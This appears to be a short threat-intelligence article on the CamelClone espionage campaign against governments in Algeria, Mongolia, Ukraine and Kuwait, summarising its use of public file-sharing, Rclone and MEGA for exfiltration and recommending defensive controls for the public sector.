CamelClone Uses Public File-Sharing Sites in Government Cyberattacks

The rise of “living‑off‑the‑land” tactics has pushed threat actors toward public file‑sharing platforms and legitimate utilities. By hosting malicious payloads on filebulldogs.com, the CamelClone operators sidestep conventional command‑and‑control servers, making network‑based signatures far less effective. Coupled with Rclone—a trusted synchronization tool—this approach blends malicious activity with normal traffic, forcing defenders to rethink detection models that rely on binary reputation alone.

Operation CamelClone’s geopolitical focus reveals a strategic intelligence‑gathering campaign. The chosen lures—Arabic, Mongolian and Arabic‑English zip files—mirror the diplomatic and energy interests of Algeria, Mongolia, Ukraine and Kuwait, suggesting state‑backed actors seeking insight into policy shifts, defence procurement and regional alliances. The use of MEGA for exfiltration, coupled with anonymous onionmail.org email accounts, adds layers of anonymity, complicating attribution and response efforts across multiple jurisdictions.

For organizations in the public sector, the lesson is clear: trusted tools can become covert data‑exfiltration channels. Implementing strict application allowlists, monitoring outbound traffic to cloud storage endpoints, and employing behavior‑based analytics for Rclone usage are essential safeguards. Regular phishing awareness training and verification of ZIP attachments can disrupt the initial infection vector, while threat‑intel sharing on IOCs such as the listed SHA‑256 hashes helps accelerate detection across the supply chain. Proactive controls and continuous visibility are now mandatory to counter these sophisticated, tool‑abuse campaigns.